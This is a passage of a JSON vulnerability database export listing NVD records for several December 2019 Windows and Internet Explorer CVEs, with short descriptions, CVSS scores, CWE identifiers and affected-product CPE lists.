"cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*"]}, {"lastseen": "2023-06-13T14:41:25", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1472.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1474", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1472", "CVE-2019-1474"], "modified": "2019-12-13T01:27:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1474", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1474", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*"]}, {"lastseen": "2023-06-13T14:41:19", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1474.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1472", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1472", "CVE-2019-1474"], "modified": "2019-12-13T01:23:00", "cpe": ["cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2019-1472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1472", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:41:52", "description": "A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1485", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2019-1485", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1485", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:40:24", "description": "A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1453", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1453"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-"], "id": "CVE-2019-1453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1453", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*"]}, {"lastseen": "2023-06-13T14:41:12", "description": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Win32k Graphics Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1468", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1468"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1468", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:41:48", "description": "A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input, aka 'Windows OLE Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1484", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1484"], "modified": "2019-12-13T17:31:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1484", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:41:14", "description": "An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Information Disclosure Vulnerability'.", "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 6.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1470", "cwe": ["CWE-20", "CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1470"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2019-1470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1470", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*"]}, {"lastseen": "2023-06-13T14:40:35", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1458", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2023-01-30T19:57:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-"], "id": "CVE-2019-1458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:41:10", "description": "An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1469", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1469"], "modified": "2019-12-11T21:19:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", 